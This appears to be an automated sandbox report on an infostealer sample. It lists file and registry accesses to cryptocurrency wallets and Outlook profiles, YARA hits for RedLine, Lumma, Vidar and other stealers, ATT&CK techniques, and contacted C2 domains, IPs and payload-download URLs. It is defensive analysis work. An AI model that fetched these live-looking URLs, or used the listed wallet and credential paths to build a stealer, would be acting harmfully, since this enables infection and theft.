                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Binance\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
                        Tries to steal Mail credentials (via file / registry access)
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeDirectory queried: C:\Users\user\Documents\iofolko5
                        Source: Yara matchFile source: Process Memory Space: kFXFCWzZNovbPAcE4V3M4DAO.exe PID: 5828, type: MEMORYSTR

                        Remote Access Functionality

                        barindex
                        Yara detected Cryptbot
                        Source: Yara matchFile source: Process Memory Space: kFXFCWzZNovbPAcE4V3M4DAO.exe PID: 5828, type: MEMORYSTR
                        Yara detected Go Injector
                        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                        Source: Yara matchFile source: 00000012.00000000.1791538975.00007FF75157B000.00000002.00000001.01000000.00000014.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000012.00000002.2923275259.00007FF75157B000.00000002.00000001.01000000.00000014.sdmp, type: MEMORY
                        Yara detected LummaC Stealer
                        Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                        Yara detected PrivateLoader
                        Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6388, type: MEMORYSTR
                        Yara detected PureLog Stealer
                        Source: Yara matchFile source: 11.2.g2v2mVtOHdxh9ZgrtYde5yf0.exe.3f55570.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.g2v2mVtOHdxh9ZgrtYde5yf0.exe.3f55570.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 33.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000021.00000002.1899246450.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000002.2116924327.0000000003F55000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Yara detected RedLine Stealer
                        Source: Yara matchFile source: 13.2.wg6F73wLMGz6xXFA14w_olCU.exe.3345570.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 13.2.wg6F73wLMGz6xXFA14w_olCU.exe.3345570.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000D.00000002.2359247420.0000000003345000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: wg6F73wLMGz6xXFA14w_olCU.exe PID: 2796, type: MEMORYSTR
                        Yara detected SmokeLoader
                        Source: Yara matchFile source: 0000002B.00000002.2943867641.0000000002A61000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.2601636491.0000000002600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.2601573090.0000000002561000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                        Yara detected Stealc
                        Source: Yara matchFile source: 0000001B.00000002.2207772758.0000000000FCA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Yara detected Vidar
                        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                        Yara detected Vidar stealer
                        Source: Yara matchFile source: 6.2.Yt_9y5LuIpBZXKd9EiYluKkG.exe.34c5570.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000006.00000002.2087266509.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: Yt_9y5LuIpBZXKd9EiYluKkG.exe PID: 1280, type: MEMORYSTR
                        Yara detected zgRAT
                        Source: Yara matchFile source: 11.2.g2v2mVtOHdxh9ZgrtYde5yf0.exe.3f55570.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.g2v2mVtOHdxh9ZgrtYde5yf0.exe.3f55570.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 33.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE

                        Mitre Att&ck Matrix

                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                        Windows Management Instrumentation                        		1
                        DLL Side-Loading                        		1
                        Abuse Elevation Control Mechanism                        		11
                        Disable or Modify Tools                        		2
                        OS Credential Dumping                        		1
                        System Time Discovery                        		Remote Services11
                        Archive Collected Data                        		12
                        Ingress Tool Transfer                        		Exfiltration Over Other Network MediumAbuse Accessibility Features
                        CredentialsDomainsDefault Accounts1
                        Native API                        		1
                        Windows Service                        		1
                        DLL Side-Loading                        		11
                        Deobfuscate/Decode Files or Information                        		1
                        Credential API Hooking                        		1
                        Account Discovery                        		Remote Desktop Protocol41
                        Data from Local System                        		21
                        Encrypted Channel                        		Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain Accounts2
                        Command and Scripting Interpreter                        		1
                        Scheduled Task/Job                        		1
                        Windows Service                        		1
                        Abuse Elevation Control Mechanism                        		1
                        Credentials in Registry                        		13
                        File and Directory Discovery                        		SMB/Windows Admin Shares1
                        Email Collection                        		3
                        Non-Application Layer Protocol                        		Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal Accounts1
                        Scheduled Task/Job                        		121
                        Registry Run Keys / Startup Folder                        		611
                        Process Injection                        		2
                        Obfuscated Files or Information                        		NTDS156
                        System Information Discovery                        		Distributed Component Object Model1
                        Credential API Hooking                        		124
                        Application Layer Protocol                        		Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
                        Scheduled Task/Job                        		3
                        Software Packing                        		LSA Secrets681
                        Security Software Discovery                        		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts121
                        Registry Run Keys / Startup Folder                        		1
                        Timestomp                        		Cached Domain Credentials261
                        Virtualization/Sandbox Evasion                        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                        DLL Side-Loading                        		DCSync2
                        Process Discovery                        		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
                        Masquerading                        		Proc Filesystem1
                        Application Window Discovery                        		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt261
                        Virtualization/Sandbox Evasion                        		/etc/passwd and /etc/shadow3
                        System Owner/User Discovery                        		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                        IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron611
                        Process Injection                        		Network Sniffing1
                        System Network Configuration Discovery                        		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1514924 Sample: SecuriteInfo.com.Win32.Cryp... Startdate: 21/09/2024 Architecture: WINDOWS Score: 100 110 45.202.35.101 ONL-HKOCEANNETWORKLIMITEDHK Seychelles 2->110 112 tventyvf20pt.top 2->112 114 12 other IPs or domains 2->114 152 Multi AV Scanner detection for domain / URL 2->152 154 Suricata IDS alerts for network traffic 2->154 156 Found malware configuration 2->156 158 25 other signatures 2->158 10 SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe 1 2->10         started        14 jewkkwnf.exe 2->14         started        16 svchost.exe 2->16         started        18 2 other processes 2->18 signatures3 process4 dnsIp5 90 SecuriteInfo.com.W...27124.19662.exe.log, ASCII 10->90 dropped 166 Writes to foreign memory regions 10->166 168 Allocates memory in foreign processes 10->168 170 Injects a PE file into a foreign processes 10->170 21 RegAsm.exe 39 10->21         started        25 RegAsm.exe 10->25         started        172 Multi AV Scanner detection for dropped file 14->172 174 Machine Learning detection for dropped file 14->174 28 WerFault.exe 16->28         started        30 WerFault.exe 16->30         started        32 WerFault.exe 16->32         started        116 127.0.0.1 unknown unknown 18->116 file6 signatures7 process8 dnsIp9 118 103.130.147.211, 49710, 80 MYREPUBLIC-AS-IDPTEkaMasRepublikID Turkey 21->118 120 176.111.174.109, 49711, 49719, 80 WILWAWPL Russian Federation 21->120 122 9 other IPs or domains 21->122 72 C:\Users\...\wg6F73wLMGz6xXFA14w_olCU.exe, PE32 21->72 dropped 74 C:\Users\...\kJHbagG0C4H5BEyYJQeInLfF.exe, PE32 21->74 dropped 76 C:\Users\...\kFXFCWzZNovbPAcE4V3M4DAO.exe, PE32 21->76 dropped 78 23 other malicious files 21->78 dropped 34 hd4YBtMwCrxG4M3aLLza89vv.exe 21->34         started        37 Yt_9y5LuIpBZXKd9EiYluKkG.exe 2 21->37         started        39 VkcBn13x2kmdo9AMRXP8qT_4.exe 21->39         started        42 11 other processes 21->42 160 Drops PE files to the document folder of the user 25->160 162 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 25->162 164 Found API chain indicative of sandbox detection 25->164 file10 signatures11 process12 dnsIp13 134 Writes to foreign memory regions 34->134 136 Allocates memory in foreign processes 34->136 138 Injects a PE file into a foreign processes 34->138 45 RegAsm.exe 34->45         started        50 conhost.exe 34->50         started        140 Contains functionality to inject code into remote processes 37->140 142 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 37->142 52 RegAsm.exe 37->52         started        54 conhost.exe 37->54         started        80 C:\Users\...\VkcBn13x2kmdo9AMRXP8qT_4.tmp, PE32 39->80 dropped 56 VkcBn13x2kmdo9AMRXP8qT_4.tmp 39->56         started        124 tventyvf20pt.top 5.53.124.195 SELECTELRU Russian Federation 42->124 82 C:\Users\user\...\ClientSecureUpdater.exe, PE32 42->82 dropped 84 C:\Users\user\AppData\...\service123.exe, PE32 42->84 dropped 86 C:\Users\user\...\MvOwPcqDrYVlvFIqJren.dll, PE32 42->86 dropped 88 C:\ProgramData\...\orpqcnvisucm.exe, PE32+ 42->88 dropped 144 Detected unpacking (changes PE section rights) 42->144 146 Detected unpacking (creates a PE file in dynamic memory) 42->146 148 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 42->148 150 12 other signatures 42->150 58 XO9lsdL5g6aUibu31TDcoBrI.exe 42->58         started        60 RegAsm.exe 42->60         started        62 RegAsm.exe 42->62         started        64 8 other processes 42->64 file14 signatures15 process16 dnsIp17 126 46.8.231.109 FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics Russian Federation 45->126 102 15 other files (12 malicious) 45->102 dropped 176 Tries to steal Mail credentials (via file / registry access) 45->176 178 Tries to harvest and steal ftp login credentials 45->178 180 Tries to harvest and steal browser information (history, passwords, etc) 45->180 128 116.203.165.127 HETZNER-ASDE Germany 52->128 130 steamcommunity.com 23.197.127.21 AKAMAI-ASN1EU United States 52->130 104 2 other malicious files 52->104 dropped 182 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 52->182 184 Tries to steal Crypto Currency Wallets 52->184 186 Tries to harvest and steal Bitcoin Wallet information 52->186 92 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 56->92 dropped 94 C:\Users\user\AppData\Local\...\_iscrypt.dll, PE32 56->94 dropped 96 C:\Users\user\AppData\...\unins000.exe (copy), PE32 56->96 dropped 106 15 other files (8 malicious) 56->106 dropped 132 92.119.114.169 ON-LINE-DATAServerlocation-NetherlandsDrontenNL Ukraine 58->132 98 XO9lsdL5g6aUibu31T...LMPgmA7iERod (copy), PE32 58->98 dropped 100 C:\Users\user\AppData\...\PowerExpertNNT.exe, PE32 58->100 dropped 108 3 other malicious files 58->108 dropped 188 Creates multiple autostart registry keys 58->188 66 schtasks.exe 58->66         started        68 WerFault.exe 60->68         started        70 conhost.exe 62->70         started        file18 signatures19 process20

                        Screenshots

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand

                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        SourceDetectionScannerLabelLink
                        SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe71%ReversingLabsByteCode-MSIL.Trojan.PrivateLoader
                        SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe42%VirustotalBrowse
                        SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe100%Joe Sandbox ML

                        Dropped Files

                        SourceDetectionScannerLabelLink
                        C:\ProgramData\jewkkwnf\jewkkwnf.exe100%Joe Sandbox ML
                        C:\ProgramData\EGCBAFCFIJ.exe79%ReversingLabsWin32.Spyware.Lummastealer
                        C:\ProgramData\EGCBAFCFIJ.exe70%VirustotalBrowse
                        C:\ProgramData\ejitkpfdxvzt\orpqcnvisucm.exe54%ReversingLabsWin64.Trojan.Privateloader
                        C:\ProgramData\ejitkpfdxvzt\orpqcnvisucm.exe64%VirustotalBrowse
                        C:\ProgramData\freebl3.dll0%ReversingLabs
                        C:\ProgramData\freebl3.dll0%VirustotalBrowse
                        C:\ProgramData\jewkkwnf\jewkkwnf.exe42%ReversingLabsByteCode-MSIL.Trojan.PrivateLoader
                        C:\ProgramData\jewkkwnf\jewkkwnf.exe33%VirustotalBrowse
                        C:\ProgramData\jewkkwnf\jewkkwnf.exe6Wob1mDxY9zsd70j (copy)42%ReversingLabsByteCode-MSIL.Trojan.PrivateLoader
                        C:\ProgramData\jewkkwnf\jewkkwnf.exe6Wob1mDxY9zsd70j (copy)33%VirustotalBrowse
                        C:\ProgramData\mozglue.dll0%ReversingLabs
                        C:\ProgramData\mozglue.dll0%VirustotalBrowse
                        C:\ProgramData\msvcp140.dll0%ReversingLabs
                        C:\ProgramData\msvcp140.dll0%VirustotalBrowse
                        C:\ProgramData\nss3.dll0%ReversingLabs
                        C:\ProgramData\nss3.dll0%VirustotalBrowse
                        C:\ProgramData\softokn3.dll0%ReversingLabs
                        C:\ProgramData\softokn3.dll0%VirustotalBrowse
                        C:\Users\userAEBAKJDGHI.exe34%ReversingLabsWin32.Infostealer.Tinba
                        C:\Users\userAEBAKJDGHI.exe41%VirustotalBrowse
                        C:\Users\userHJDBAFIECG.exe26%ReversingLabsWin32.Trojan.Cerbu
                        C:\Users\userHJDBAFIECG.exe40%VirustotalBrowse
                        C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe42%ReversingLabsByteCode-MSIL.Trojan.PrivateLoader
                        C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe33%VirustotalBrowse
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\66ea645129e6a_jacobs[1].exe54%ReversingLabsWin64.Trojan.Privateloader
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\66ea645129e6a_jacobs[1].exe64%VirustotalBrowse
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\66ed9885d9aee_Day2[1].exe47%ReversingLabsWin32.Spyware.Lummastealer
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\66ed9885d9aee_Day2[1].exe52%VirustotalBrowse
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\easyfirewall[1].exe13%ReversingLabs
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\easyfirewall[1].exe26%VirustotalBrowse

                        Unpacked PE Files

                        No Antivirus matches

                        Domains

                        SourceDetectionScannerLabelLink
                        s3-w.us-east-1.amazonaws.com0%VirustotalBrowse
                        bitbucket.org1%VirustotalBrowse
                        cowod.hopto.org1%VirustotalBrowse
                        nerv.com.pe6%VirustotalBrowse
                        steamcommunity.com0%VirustotalBrowse
                        iplogger.org0%VirustotalBrowse
                        tventyvf20pt.top0%VirustotalBrowse
                        api64.ipify.org0%VirustotalBrowse
                        bbuseruploads.s3.amazonaws.com3%VirustotalBrowse
                        questionmwq.shop3%VirustotalBrowse
                        ipinfo.io0%VirustotalBrowse

                        URLs

                        No Antivirus matches

                        Domains and IPs

                        Contacted Domains

                        NameIPActiveMaliciousAntivirus DetectionReputation
                        s3-w.us-east-1.amazonaws.com
                        		52.217.131.81
                        		truefalse
                        bitbucket.org
                        		185.166.143.50
                        		truefalse
                        steamcommunity.com
                        		23.197.127.21
                        		truetrue
                        tventyvf20pt.top
                        		5.53.124.195
                        		truetrue
                        cowod.hopto.org
                        		45.132.206.251
                        		truetrue
                        ipinfo.io
                        		34.117.59.81
                        		truefalse
                        iplogger.org
                        		104.26.2.46
                        		truefalse
                        questionmwq.shop
                        		172.67.204.62
                        		truetrue
                        nerv.com.pe
                        		162.241.61.218
                        		truefalse
                        api64.ipify.org
                        		104.237.62.213
                        		truefalse
                        bbuseruploads.s3.amazonaws.com
                        		unknown
                        		unknowntrue

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        opponnentduei.shoptrue
                          http://46.8.231.109/1309cdeb8f4c8736/softokn3.dlltrue
                            http://176.113.115.33/thebig/noode.exefalse
                              193.233.255.84:4284true
                                quotamkdsdqo.shoptrue
                                  http://147.45.44.104/yuop/66edb89bc4073_crypted.exe#xinfalse
                                    chickerkuso.shoptrue
                                      https://116.203.165.127/softokn3.dlltrue
                                        analforeverlovyu.toptrue
                                          https://api64.ipify.org/?format=jsonfalse
                                            http://147.45.44.104/yuop/66eea6336b153_app16540406983468141987.exe#1false
                                              http://nwgrus.ru/tmp/index.phptrue
                                                http://147.45.44.104/lopsa/66ebb3bf78bd6_Send.exe#111us300false
                                                  https://steamcommunity.com/profiles/76561199780418869true
                                                    http://103.130.147.211/Files/1.exetrue
                                                      http://46.8.231.109/true
                                                        http://46.8.231.109/1309cdeb8f4c8736/nss3.dlltrue
                                                          http://147.45.44.104/prog/66ecb454d2b4a_lgfdsjgds.exefalse
                                                            http://tech-servers.in.net/tmp/index.phptrue
                                                              http://46.8.231.109/1309cdeb8f4c8736/sqlite3.dlltrue
                                                                http://46.8.231.109/c4754d4f680ead72.phptrue
                                                                  entyvf20pt.toptrue
                                                                    achievenmtynwjq.shoptrue

                                                                      URLs from Memory and Binaries

                                                                      NameSourceMaliciousAntivirus DetectionReputation
                                                                      https://bitbucket.org/kcatelin/jameson/downloads/easyfirewall.exee9RegAsm.exe, 00000003.00000002.1832712263.0000000003E60000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        https://gcc.gnu.org/bugs/):kFXFCWzZNovbPAcE4V3M4DAO.exe, 00000008.00000002.2952837551.0000000001409000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          http://176.113.115.33/thebig/noode.exeC:RegAsm.exe, 00000003.00000002.1832712263.0000000003E60000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            http://147.45.44.104/yuop/66ed9885d9aee_Day2.exe#RegAsm.exe, 00000003.00000002.1832712263.0000000003EC4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              http://tventyvf20pt.top/ekFXFCWzZNovbPAcE4V3M4DAO.exe, 00000008.00000002.2949484745.000000000134B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                http://tventyvf20pt.top/dkFXFCWzZNovbPAcE4V3M4DAO.exe, 00000008.00000002.2946311019.000000000130E000.00000004.00000020.00020000.00000000.sdmp, kFXFCWzZNovbPAcE4V3M4DAO.exe, 00000008.00000002.2949484745.000000000134B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  http://147.45.44.104/yuop/66eea6336b153_app16540406983468141987.exe#1perRegAsm.exe, 00000003.00000002.1830248913.00000000014E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    http://176.111.174.109/kurwaC:RegAsm.exe, 00000003.00000002.1832712263.0000000003E60000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      https://aka.ms/msal-client-appsXO9lsdL5g6aUibu31TDcoBrI.exe, 0000000F.00000000.1788981132.0000000000E22000.00000002.00000001.01000000.00000012.sdmpfalse
                                                                                        https://aka.ms/msal-net-enable-keychain-accessXO9lsdL5g6aUibu31TDcoBrI.exe, 0000000F.00000000.1788981132.0000000000E22000.00000002.00000001.01000000.00000012.sdmpfalse
                                                                                          http://147.45.44.104/yuop/66ee79315857f_setup33333.exe#lylaSRegAsm.exe, 00000003.00000002.1830248913.00000000014E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            http://tventyvf20pt.top/TkFXFCWzZNovbPAcE4V3M4DAO.exe, 00000008.00000002.2949484745.000000000134B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              http://cowod.hopto.org_DEBUG.zip/cYt_9y5LuIpBZXKd9EiYluKkG.exe, 00000006.00000002.2087266509.00000000034F4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                http://schemas.xmlsoap.org/soap/httpXO9lsdL5g6aUibu31TDcoBrI.exe, 0000000F.00000000.1788981132.0000000000E22000.00000002.00000001.01000000.00000012.sdmpfalse
                                                                                                  http://147.45.44.104/yuop/66ee79315857f_setup33333.exe#lyla#RegAsm.exe, 00000003.00000002.1830248913.00000000014E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    http://103.130.147.211/Files/1.exeC:RegAsm.exe, 00000003.00000002.1832712263.0000000003E60000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      https://sso2urn:ietf:wg:oauth:2.0:oobXO9lsdL5g6aUibu31TDcoBrI.exe, 0000000F.00000000.1788981132.0000000000E22000.00000002.00000001.01000000.00000012.sdmpfalse
                                                                                                        https://steamcommunity.com/profiles/76561199780418869u55uhttps://t.me/ae5edMozilla/5.0Yt_9y5LuIpBZXKd9EiYluKkG.exe, 00000006.00000002.2087266509.00000000034F4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          https://aka.ms/msal-net-upXO9lsdL5g6aUibu31TDcoBrI.exe, 0000000F.00000000.1788981132.0000000000E22000.00000002.00000001.01000000.00000012.sdmpfalse
                                                                                                            http://schemas.xmlsoap.org/wsdl/soap12/shttp://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702ihtXO9lsdL5g6aUibu31TDcoBrI.exe, 0000000F.00000000.1788981132.0000000000E22000.00000002.00000001.01000000.00000012.sdmpfalse
                                                                                                              http://tventyvf20pt.top/v1/upload.phpkFXFCWzZNovbPAcE4V3M4DAO.exe, 00000008.00000002.2946311019.000000000130E000.00000004.00000020.00020000.00000000.sdmp, kFXFCWzZNovbPAcE4V3M4DAO.exe, 00000008.00000002.2949330729.0000000001334000.00000004.00000020.00020000.00000000.sdmp, kFXFCWzZNovbPAcE4V3M4DAO.exe, 00000008.00000003.1974938378.0000000001349000.00000004.00000020.00020000.00000000.sdmp, kFXFCWzZNovbPAcE4V3M4DAO.exe, 00000008.00000002.2949484745.000000000134B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                http://147.45.44.104/yuop/66ed9885d9aee_Day2.exexexinsRegAsm.exe, 00000003.00000002.1832712263.0000000003EC4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  http://176.111.174.109/kurwaxetRegAsm.exe, 00000003.00000002.1830248913.00000000014E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    https://api.ip.sb/ipwg6F73wLMGz6xXFA14w_olCU.exe, 0000000D.00000002.2359247420.0000000003345000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      http://147.45.44.104/prog/66e705d09b33c_jack.exeARegAsm.exe, 00000003.00000002.1830248913.00000000014E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        https://iplogger.org:443/1nhuM4.jsRegAsm.exe, 00000003.00000002.1830248913.00000000014E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineVkcBn13x2kmdo9AMRXP8qT_4.exe, 00000010.00000002.2929361187.0000000000401000.00000020.00000001.01000000.00000010.sdmpfalse
                                                                                                                            http://147.45.44.104/yuop/66ed9885d9aee_Day2.exe_RegAsm.exe, 00000003.00000002.1830248913.00000000014E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              http://147.45.44.104/yuop/66edb89bc4073_crypted.exe#xinC:RegAsm.exe, 00000003.00000002.1832712263.0000000003E60000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                http://www.symauth.com/cps0(kJHbagG0C4H5BEyYJQeInLfF.exe, 0000000C.00000002.2392516588.00000000026D8000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                  http://147.45.44.104/prog/66e705d09b33c_jack.exeLRegAsm.exe, 00000003.00000002.1830248913.00000000014E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    http://147.45.44.104/yuop/66edb89bc4073_crypted.exe#xinyRegAsm.exe, 00000003.00000002.1830248913.000000000148D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      http://schemas.xmlsoap.org/ws/2005/02/trust/Issueshttp://schemas.xmlsoap.org/ws/2005/05/identity/NoPXO9lsdL5g6aUibu31TDcoBrI.exe, 0000000F.00000000.1788981132.0000000000E22000.00000002.00000001.01000000.00000012.sdmpfalse
